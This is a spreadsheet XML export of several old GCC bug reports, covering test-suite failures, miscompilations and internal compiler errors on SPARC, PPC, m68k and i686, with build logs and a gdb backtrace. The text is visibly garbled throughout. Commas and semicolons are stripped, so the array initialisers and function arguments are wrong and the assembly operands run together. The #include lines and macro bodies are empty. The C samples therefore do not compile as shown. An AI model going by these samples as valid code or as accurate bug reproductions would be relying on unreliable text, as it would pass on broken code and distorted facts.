runtest --tool g++ --target_board unix{-mabi=64}
When I try the following only the first option works:
runtest --tool g++ --target_board unix{-mabi=64}
runtest --tool g++ --target_board unix{-mabi=64}
The problem is that the testsuite is setting the that the 
environment variables LD_LIBRARYN32_PATH and 
LD_LIBRARY64_PATH at the start of the run based on the 
first ABI and not resetting them for the second ABI.
Release:
gcc 3.1
Environment:
mips-sgi-irix6.5
How-To-Repeat:
build with multilibs enabled
cd gcc/testsuite
runtest --tool g++ --target_board unix{-mabi=64}</t>
  </si>
  <si>
    <t>GCC-18135</t>
  </si>
  <si>
    <t>gctest (boehm-gc) uses the installed libgcc_s on darwin</t>
  </si>
  <si>
    <t>I found this when I was running the testsuite on a new compiler with a new prefix that was empty.
creating gctest
make AR_FLAGS=rc CC_FOR_BUILD=gcc CFLAGS=-O2 -g -O2 CXXFLAGS=-g -O2 
CFLAGS_FOR_BUILD= CFLAGS_FOR_TARGET=-O2 -g -O2 INSTALL=/usr/bin/install -c 
INSTALL_DATA=/usr/bin/install -c -m 644 INSTALL_PROGRAM=/usr/bin/install -c 
INSTALL_SCRIPT=/usr/bin/install -c LDFLAGS= LIBCFLAGS=-O2 -g -O2 
LIBCFLAGS_FOR_TARGET=-O2 -g -O2 MAKE=make MAKEINFO=makeinfo --split-size=5000000   
PICFLAG= PICFLAG_FOR_TARGET= SHELL=/bin/sh EXPECT=expect RUNTEST=runtest 
RUNTESTFLAGS= exec_prefix=/Users/pinskia/local1 infodir=/Users/pinskia/local1/info libdir=/
Users/pinskia/local1/lib prefix=/Users/pinskia/local1 tooldir=/Users/pinskia/local1/powerpc-
apple-darwin7.4.1 AR=ar AS=as CC=/Users/pinskia/src/local1/gcc/objdir/gcc/xgcc -B/Users/
pinskia/src/local1/gcc/objdir/gcc/ -B/Users/pinskia/local1/powerpc-apple-darwin7.4.1/bin/ -B/
Users/pinskia/local1/powerpc-apple-darwin7.4.1/lib/ -isystem /Users/pinskia/local1/powerpc-apple-
darwin7.4.1/include -isystem /Users/pinskia/local1/powerpc-apple-darwin7.4.1/sys-include CXX=/
Users/pinskia/src/local1/gcc/objdir/gcc/g++ -B/Users/pinskia/src/local1/gcc/objdir/gcc/ 
-nostdinc++ -nostdinc++ -I/Users/pinskia/src/local1/gcc/objdir/powerpc-apple-darwin7.4.1/
libstdc++-v3/include/powerpc-apple-darwin7.4.1 -I/Users/pinskia/src/local1/gcc/objdir/powerpc-
apple-darwin7.4.1/libstdc++-v3/include -I/Users/pinskia/src/local1/gcc/libstdc++-v3/libsupc++ -I/
Users/pinskia/src/local1/gcc/libstdc++-v3/libsupc++ -I/Users/pinskia/src/local1/gcc/libstdc++-v3/
include/backward -I/Users/pinskia/src/local1/gcc/libstdc++-v3/testsuite -L/Users/pinskia/src/
local1/gcc/objdir/powerpc-apple-darwin7.4.1/libstdc++-v3/src -L/Users/pinskia/src/local1/gcc/
objdir/powerpc-apple-darwin7.4.1/libstdc++-v3/src/.libs -B/Users/pinskia/local1/powerpc-apple-
darwin7.4.1/bin/ -B/Users/pinskia/local1/powerpc-apple-darwin7.4.1/lib/ -isystem /Users/pinskia/
local1/powerpc-apple-darwin7.4.1/include -isystem /Users/pinskia/local1/powerpc-apple-
darwin7.4.1/sys-include LD=ld LIBCFLAGS=-O2 -g -O2 NM=nm PICFLAG= RANLIB=ranlib -c 
DESTDIR= check-TESTS
dyld: gctest can't open library: /Users/pinskia/local1/lib/libgcc_s.1.0.dylib  (No such file or directory 
errno = 2)
FAIL: gctest
===================
1 of 1 tests failed</t>
  </si>
  <si>
    <t>GCC-2556</t>
  </si>
  <si>
    <t>gcc (3 CVS branch) SPARC produces code with a nonexisting label</t>
  </si>
  <si>
    <t>The following code produces assembly output with the following
line in but with no label LL9 defined:
	sethi	%hi(_GLOBAL_OFFSET_TABLE_-(.LL9-.)) %g2
(The code is from the XFree source distribution it has
been preprocessed and reduced as far as it will go while
still producing the error.  Removing the -O2 or the -fPIC
stops it failing)
Release:
GCC: (GNU) 3.0 20010407 (prerelease)
Environment:
Linux/SPARC
How-To-Repeat:
gcc -c -O2 -fPIC Paned_hack.i -S</t>
  </si>
  <si>
    <t>GCC-8313</t>
  </si>
  <si>
    <t>[PPC] gcc 3.2 on -O2 and yields bad code for unsigned short argument</t>
  </si>
  <si>
    <t>This error occurs only on optimization level 2  When passing in an argument of type unsigned short = 65535 gcc3.2 on the ppc generates the code li 3-1 which incorrectly sign extends the value in the register to a 32-bit -1 rather than a 16-bit -1.
Release:
unknown
Environment:
gentoo linux 1.4 PPC (G4 Cube)
How-To-Repeat:
gcc -O2 test.c
./a.out
This will be an inifinite loop though the code should terminate after 2 calls to inf_loop.</t>
  </si>
  <si>
    <t>awong</t>
  </si>
  <si>
    <t>GCC-6898</t>
  </si>
  <si>
    <t>gcc produces incorrect minimization code</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #40189.
  Please CC 40189@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/40189 ]
The following program inconsistently chooses minimal
array elements in case of equal elements being present.
intech19:~$ gcc -g ttr.c -o ttr
intech19:~$ ./ttr
ir=0
ir=3
On all other optimization levels (-Os -O1 and up) the expected
output is:
intech19:~$ ./ttr
ir=0
ir=0
Here is the code (ttr.c):
------------------------
#include 
#include 
#include 
int
main() {
  double a[4]={0.0067762.53.00.006776}
         w[4]={0.0000303.73.00.000030}
         t
         amin
  int ir i nr = 4
  double tol = 9.31322574615479e-10 * 3.0
  for (i=0 ir=-1 amin = DBL_MAX i &lt; nr i++) 
    if (a[i] &gt; tol) {
      t = w[i] / a[i]
      if (t &lt; amin || ir == -1) {
	amin = t
	ir = i
      }
    }
  printf(ir=%d\n ir)
  for (i = 0 ir = -1 amin = DBL_MAX i &lt; nr i++) 
    if (a[i] &gt; tol &amp;&amp; ((t = w[i] / a[i]) &lt; amin || ir == -1)) {
	amin = t
	ir = i
      }
  printf(ir=%d\n ir)
  return 0
}
Release:
3.1 (Debian) (Debian unstable)
Environment:
System: Debian GNU/Linux (unstable)
Architecture: i686
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (StatusErr: uppercase=bad)
||/ Name           Version        Description
+++-==============-==============-============================================
ii  gcc-3.1        3.1-2          The GNU C compiler.
ii  binutils       2.12.90.0.7-1  The GNU assembler linker and binary utiliti
ii  libc6          2.2.5-6        GNU C Library: Shared libraries and Timezone
host: i386-linux
configured with: /mnt/data/gcc-3.1/gcc-3.1-3.1ds2/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=$\(prefix\)/share/man --infodir=$\(prefix\)/share/info --with-gxx-include-dir=$\(prefix\)/include/g++-v3-3.1 --enable-shared --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --enable-clocale=gnu --enable-threads=posix --enable-java-gc=boehm --enable-objc-gc i386-linux</t>
  </si>
  <si>
    <t>40189</t>
  </si>
  <si>
    <t>GCC-6080</t>
  </si>
  <si>
    <t>incorrect loop optimizations</t>
  </si>
  <si>
    <t>gcc -O5 makes incorrect loop optimizations on the following code:
// case A: h get called infinite times
static void ug0(unsigned int count)
{
  while (count &gt; 0) { ug0(0) h() count-- }
}
void uf0() { ug0(1000) }
// case B: h gets called only once
static void sg0(int count)
{
  while (count &gt; 0) { sg0(0) h() count-- }
}
void sf0() { sg0(1000) }
This is the m68k code that gets produced (ppc code exhibits same problem...)
80000128 :
80000128:       4e56 0000       linkw %fp#0
8000012c:       42a7            clrl %sp@-
8000012e:       6120            bsrs 80000150 
80000130:       61ff ffff ffda  bsrl 8000010c 
80000136:       588f            addql #4%sp
80000138:       60f2            bras 8000012c 
8000013a:       4e71            nop
8000013c :
8000013c:       4e56 0000       linkw %fp#0
80000140:       42a7            clrl %sp@-
80000142:       6130            bsrs 80000174 
80000144:       61ff ffff ffc6  bsrl 8000010c 
8000014a:       588f            addql #4%sp
8000014c:       4e5e            unlk %fp
8000014e:       4e75            rts
Release:
3.0.4
Environment:
System: Linux aljazari 2.4.13-KURT #2 Thu Nov 8 10:49:33 CET 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: m68k-unknown-elf
configured with: ../../../gcc-3.0.4/configure --prefix=/usr/local/packages/cross
/m68k-elf --target=m68k-elf --with-newlib : (reconfigured) ../../../gcc-3.0.4/co
nfigure --prefix=/usr/local/packages/cross/m68k-elf --target=m68k-elf --with-new
lib : (reconfigured) ../../../gcc-3.0.4/configure --with-gcc-version-trigger=/wo
rk/aljazari2/andersb/gnu/gcc-3.0.4/gcc/version.c --host=i686-pc-linux-gnu --pref
ix=/usr/local/packages/cross/m68k-elf --target=m68k-elf --with-newlib --enable-c
hecking=misctreertlgcgcac
How-To-Repeat:
Compile the testprogram with -O5</t>
  </si>
  <si>
    <t>GCC-17329</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE: SEGV in java_gimplify_expr</t>
  </si>
  <si>
    <t>I get a SEGV in jc1 while building jython from rhug.  No small test case yet.
This happens at any optimization level.
$ ./jc1
/home/green/sources/jhbuild-src/rhug/jython/upstream/src/org/python/util/jython.java
-fhash-synchronization -fno-use-divide-subroutine -fuse-boehm-gc
-fnon-call-exceptions -fno-omit-frame-pointer -fkeep-inline-functions -quiet
-dumpbase jython.java -mtune=pentiumpro -auxbase-strip
upstream/src/org/python/util/.libs/jython.o -g -O0 -Wno-deprecated -version
-fencoding=ISO-8859-1 -fno-assert
-fclasspath=upstream/src:/home/green/sources/jhbuild-src/rhug/jython/upstream/src:/home/green/sources/jhbuild-src/rhug/jython/../gnu.readline/upstream/src:/home/green/sources/jhbuild-src/rhug/jython/../jakarta-oro/upstream/src/java:/home/green/sources/jhbuild-src/rhug/jython/../jakarta-servletapi-4/upstream/src/share
-fassume-compiled -fPIC
[lots of output deleted]
/home/green/sources/jhbuild-src/rhug/jython/upstream/src/org/python/util/jython.java:261:
internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
and from gdb....
Program received signal SIGSEGV Segmentation fault.
0x080bd4eb in java_gimplify_expr (expr_p=0xf6eca334 pre_p=0xfeeae174
    post_p=0xfeeae170)
    at /home/green/sources/jhbuild-src/gcc/gcc/java/java-gimplify.c:111
111           if (TREE_CODE (TREE_OPERAND (*expr_p 0)) == VAR_DECL)
(gdb) where
#0  0x080bd4eb in java_gimplify_expr (expr_p=0xf6eca334 pre_p=0xfeeae174
    post_p=0xfeeae170)
    at /home/green/sources/jhbuild-src/gcc/gcc/java/java-gimplify.c:111
During symbol reading Incomplete CFI data unspecified registers at
0x080bd542.During symbol reading Incomplete CFI data unspecified registers at
0x080bd542.During symbol reading Incomplete CFI data unspecified registers at
0x080bd542.During symbol reading Incomplete CFI data unspecified registers at
0x080bd542.#1  0x080e17cd in gimplify_expr (expr_p=0xf6eca334 pre_p=0xfeeae174
    post_p=0xfeeae170 gimple_test_f=0x80d87a4 
    fallback=fb_none)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3539
During symbol reading Incomplete CFI data unspecified registers at
0x080e1a10.During symbol reading Incomplete CFI data unspecified registers at
0x080e1a10.During symbol reading Incomplete CFI data unspecified registers at
0x080e1a10.During symbol reading Incomplete CFI data unspecified registers at
0x080e1a10.#2  0x080e168d in gimplify_stmt (stmt_p=0xf6eca334)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3437
During symbol reading Incomplete CFI data unspecified registers at
0x080e1688.During symbol reading Incomplete CFI data unspecified registers at
0x080e1688.During symbol reading Incomplete CFI data unspecified registers at
0x080e1688.During symbol reading Incomplete CFI data unspecified registers at
0x080e1688.During symbol reading Incomplete CFI data unspecified registers at
0x080e1688.During symbol reading Incomplete CFI data unspecified registers at
0x080e1688.During symbol reading Incomplete CFI data unspecified registers at
0x080e1688.#3  0x080e019d in gimplify_compound_expr (expr_p=0xfeeae290
pre_p=0xfeeae474
    want_value=1 '\001')
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:2965
During symbol reading Incomplete CFI data unspecified registers at
0x080e0219.During symbol reading Incomplete CFI data unspecified registers at
0x080e0219.During symbol reading Incomplete CFI data unspecified registers at
0x080e0219.During symbol reading Incomplete CFI data unspecified registers at
0x080e0219.#4  0x080e230a in gimplify_expr (expr_p=0xfeeae290 pre_p=0xfeeae474
    post_p=0xfeeae470 gimple_test_f=0x80d84f4 
    fallback=fb_rvalue)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3585
During symbol reading Incomplete CFI data unspecified registers at
0x080e23e1.#5  0x080d96e6 in internal_get_tmp_var (val=0xf6eca318 pre_p=0xfeeae474
    post_p=0xfeeae470 is_formal=0 '\0')
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:468
#6  0x080d97ce in get_initialized_tmp_var (val=0xf6eca318 pre_p=0xfeeae474
    post_p=0xfeeae470)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:497
#7  0x080e037c in gimplify_save_expr (expr_p=0xf6de29ac pre_p=0xfeeae474
    post_p=0xfeeae470)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3045
#8  0x080e268f in gimplify_expr (expr_p=0xf6de29ac pre_p=0xfeeae474
    post_p=0xfeeae470 gimple_test_f=0x80d896c 
    fallback=fb_rvalue)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3756
#9  0x080bd64c in java_gimplify_expr (expr_p=0x3c pre_p=0xfeeae474
    post_p=0xfeeae470)
    at /home/green/sources/jhbuild-src/gcc/gcc/java/java-gimplify.c:147
#10 0x080e17cd in gimplify_expr (expr_p=0xf6de29d4 pre_p=0xfeeae474
    post_p=0xfeeae470 gimple_test_f=0x80d85f8 
    fallback=fb_rvalue)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3539
#11 0x080dfdce in gimplify_modify_expr (expr_p=0xf6ddb5c0 pre_p=0xfeeae474
    post_p=0xfeeae470 want_value=0 '\0')
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:2852
#12 0x080e2327 in gimplify_expr (expr_p=0xf6ddb5c0 pre_p=0xfeeae474
    post_p=0xfeeae470 gimple_test_f=0x80d87a4 
    fallback=fb_none)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3590
#13 0x080e168d in gimplify_stmt (stmt_p=0xf6ddb5c0)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3437
#14 0x080e16a1 in gimplify_to_stmt_list (stmt_p=0xf6ddb5c0)
---Type  to continue or q  to quit---
[etc]
(gdb) p expr_p
$1 = (tree *) 0xf6eca334
(gdb) pt
 &lt;this 0xf6eca334
    type &lt;var_decl 0xf5fd189c verbose
        type &lt;integer_type 0xf6ecb3a0 int public SI
            size 
            unit size 
            align 32 symtab 0 alias set 16 precision 32 min &lt;integer_cst
0xf6ec8270 -2147483648&gt; max 
            pointer_to_this  chain &lt;type_decl
0xf6ecb414 int&gt;&gt;
        public static external decl_1 SI file
/home/green/sources/jhbuild-src/rhug/jython/upstream/src/org/python/core/Options.java
line 61 size  unit size 
        align 32 context 
initial 
        (mem/i:SI (symbol_ref:SI (_ZN3org6python4core7Options7verboseE) [flags
0x40] ) [16 verbose+0 S4 A32])
        chain &lt;var_decl 0xf5fd1910 deprecatedKeywordMangling type &lt;boolean_type
0xf6ecbf68 boolean&gt;
            public static unsigned external decl_1 QI file
/home/green/sources/jhbuild-src/rhug/jython/upstream/src/org/python/core/Options.java
line 67
            size 
            unit size 
            align 8 context 
initial  chain &gt;&gt;
    side-effects readonly constant invariant public protected static deprecated
visited tree_1 tree_2 tree_4 tree_5 tree_6
    chain &lt;save_expr 0xf5f89800
        type &lt;void_type 0xf6ecbc3c void VOID
            align 1 symtab 0 alias set -1
            pointer_to_this  chain &lt;type_decl
0xf6ecbcb0 void&gt;&gt;
        side-effects invariant public tree_5&gt;&gt;</t>
  </si>
  <si>
    <t>GCC-1648</t>
  </si>
  <si>
    <t>ice: i686-pc-linux-gnu with -march=i686 but not with -march=i586</t>
  </si>
  <si>
    <t>The following file ts.c a stripped-down version of the file kernel/sys.c
from the linux-2.4.0-test12 kernel sources generates an Internal
error: Segmentation fault when compiled with -O -march=i686 as
command line options. When the -march option is dropped or replaced
with -march=i586 the source file is compiled without a problem.
Release:
2.97 20010111 (experimental)
Environment:
System: Linux kiste 2.4.0-test12 #22 Sun Dec 17 17:24:36 CET 2000 i686 unknown
Architecture: i686
glibc 2.1.3
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
Suse 6.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls
How-To-Repeat:
Source code ts.c:
struct task_struct {
	long nice
	struct task_struct *next_task *prev_task
}
union task_union {
	struct task_struct task
}
extern union task_union init_task_union
#define init_task	(init_task_union.task)
#define for_each_task(p) \
	for (p =  (p = p-&gt;next_task) !=  )
static int proc_sel(struct task_struct *p int which int who)
{
	return 0
}
#define for_each_task(p) \
	for (p =  (p = p-&gt;next_task) !=  )
long sys_setpriority(int which int who int niceval)
{
	struct task_struct *p
	int error
	error = 10
	if (niceval &lt; -20)
		niceval = -20
	if (niceval &gt; 19)
		niceval = 19
	for_each_task(p) {
			p-&gt;nice = niceval
	}
	return error
}
Preprocessor source ts.i:
# 1 ts.c
struct task_struct {
        long nice
        struct task_struct *next_task *prev_task
}
union task_union {
        struct task_struct task
}
extern union task_union init_task_union
# 20 ts.c
static int proc_sel(struct task_struct *p int which int who)
{
        return 0
}
long sys_setpriority(int which int who int niceval)
{
        struct task_struct *p
        int error
        error = 10
        if (niceval &lt; -20)
                niceval = -20
        if (niceval &gt; 19)
                niceval = 19
        for (p =  (p = p-&gt;next_task) !=  ) {
                        p-&gt;nice = niceval
        }
        return error
}
Compilation of the source code ts.c with varying command line options
 gcc -Q -v -O -march=i686  -c ts.c -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc/configure --enable-shared --disable-nls
gcc version 2.97 20010111 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cpp0 -lang-c -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__i686 -D__i686__ -D__pentiumpro -D__pentiumpro__ -D__tune_i686__ -D__tune_pentiumpro__ ts.c ts.i
GNU CPP version 2.97 20010111 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cc1 -fpreprocessed ts.i -dumpbase ts.c -march=i686 -O -version -o ts.s
GNU CPP version 2.97 20010111 (experimental) (cpplib) (i386 Linux/ELF)
GNU C version 2.97 20010111 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 2.97 20010111 (experimental).
options passed:  -fpreprocessed -march=i686 -O
options enabled:  -fdefer-pop -fthread-jumps -fpeephole -ffunction-cse
 -finline -fkeep-static-consts -fpcc-struct-return -fsched-interblock
 -fsched-spec -fbranch-count-reg -fnew-exceptions -fcommon -fgnu-linker
 -fargument-alias -fident -fmath-errno -m80387 -mhard-float -mno-soft-float
 -mieee-fp -mfp-ret-in-387 -march=i686
 proc_sel sys_setpriority
ts.c: In function `sys_setpriority':
ts.c:46: Internal error: Segmentation fault.
Please submit a full bug report.
 See  for instructions.
 gcc -Q -v -O -c ts.c -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc/configure --enable-shared --disable-nls
gcc version 2.97 20010111 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cpp0 -lang-c -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ ts.c ts.i
GNU CPP version 2.97 20010111 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cc1 -fpreprocessed ts.i -dumpbase ts.c -O -version -o ts.s
GNU CPP version 2.97 20010111 (experimental) (cpplib) (i386 Linux/ELF)
GNU C version 2.97 20010111 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 2.97 20010111 (experimental).
options passed:  -fpreprocessed -O
options enabled:  -fdefer-pop -fthread-jumps -fpeephole -ffunction-cse
 -finline -fkeep-static-consts -fpcc-struct-return -fsched-interblock
 -fsched-spec -fbranch-count-reg -fnew-exceptions -fcommon -fgnu-linker
 -fargument-alias -fident -fmath-errno -m80387 -mhard-float -mno-soft-float
 -mieee-fp -mfp-ret-in-387
 proc_sel sys_setpriority
Execution times (seconds)
 preprocessing         :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 lexical analysis      :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 parser                :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 6%) wall
 varconst              :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 jump                  :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 CSE                   :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 loop analysis         :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 CSE 2                 :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 flow analysis         :   0.01 ( 7%) usr   0.00 ( 0%) sys   0.01 ( 6%) wall
 combiner              :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 if-conversion         :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 local alloc           :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 global alloc          :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 reload CSE regs       :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 flow 2                :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 if-conversion 2       :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 shorten branches      :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 reg stack             :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 final                 :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 symout                :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 rest of compilation   :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 TOTAL                 :   0.15             0.00             0.16
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o ts.o ts.s
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
 gcc -Q -v -O -march=i586 -c ts.c -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc/configure --enable-shared --disable-nls
gcc version 2.97 20010111 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cpp0 -lang-c -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__i586 -D__i586__ -D__pentium -D__pentium__ -D__tune_i586__ -D__tune_pentium__ ts.c ts.i
GNU CPP version 2.97 20010111 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cc1 -fpreprocessed ts.i -dumpbase ts.c -march=i586 -O -version -o ts.s
GNU CPP version 2.97 20010111 (experimental) (cpplib) (i386 Linux/ELF)
GNU C version 2.97 20010111 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 2.97 20010111 (experimental).
options passed:  -fpreprocessed -march=i586 -O
options enabled:  -fdefer-pop -fthread-jumps -fpeephole -ffunction-cse
 -finline -fkeep-static-consts -fpcc-struct-return -fsched-interblock
 -fsched-spec -fbranch-count-reg -fnew-exceptions -fcommon -fgnu-linker
 -fargument-alias -fident -fmath-errno -m80387 -mhard-float -mno-soft-float
 -mieee-fp -mfp-ret-in-387 -march=i586
 proc_sel sys_setpriority
Execution times (seconds)
 preprocessing         :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 lexical analysis      :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 parser                :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 varconst              :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 jump                  :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 CSE                   :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 loop analysis         :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 CSE 2                 :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 flow analysis         :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 combiner              :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 if-conversion         :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 local alloc           :   0.01 ( 6%) usr   0.00 ( 0%) sys   0.01 ( 5%) wall
 global alloc          :   0.01 ( 6%) usr   0.00 ( 0%) sys   0.01 ( 5%) wall
 reload CSE regs       :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 flow 2                :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 if-conversion 2       :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 shorten branches      :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 reg stack             :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 final                 :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 symout                :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 rest of compilation   :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall
 TOTAL                 :   0.16             0.01             0.21
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o ts.o ts.s
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4</t>
  </si>
  <si>
    <t>GCC-34814</t>
  </si>
  <si>
    <t>SDmode function args not passed according to ABI specification</t>
  </si>
  <si>
    <t>Currently SDmode (_Decimal32) types are not passed to and returned from functions in FP registers as mandated by the ABI.  Instead they are passed via the integer registers.  This bugzilla will be used for tracking my work on fixing this.</t>
  </si>
  <si>
    <t>GCC-9302</t>
  </si>
  <si>
    <t>[3.3?/3.4 regression]-o and -c preclude use of -include</t>
  </si>
  <si>
    <t>When using -o in conjunction with -c it is no longer possible to use 
-include.
I would guess it's related to precompiled headers (PCH for 
keyword-searchers) but I'll leave it to someone more experienced to 
decide that and mark the description as appropriate.
Projects like mozilla which compiled without error in 3.2 will fail to 
compile without (at least Makefile) modification on 3.4 as a result of 
this bug.
Release:
3.4 20030113 (experimental)
Environment:
System: Linux scragen 2.4.20 #9 Sun Jan 5 12:41:42 EST 2003 i686 unknown unknown GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/home/riceman --program-suffix=-cust
How-To-Repeat:
$ cat abc.cpp
int main() {
  return 0
}
$ cat abc.h
#define ABC 0
$ g++ --version
2.95.4
$ g++-3.2 --version
g++-3.2 (GCC) 3.2.2 20030109 (Debian prerelease)
Copyright (C) 2002 Free Software Foundation Inc.
This is free software see the source for copying conditions.  
There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE.
$ g++ -o abc.o -c abc.cpp -include abc.h
$ rm abc.o
$ g++-3.2 -o abc.o -c abc.cpp -include abc.h
$ rm abc.o
$ g++-cust -o abc.o -c abc.cpp -include abc.h
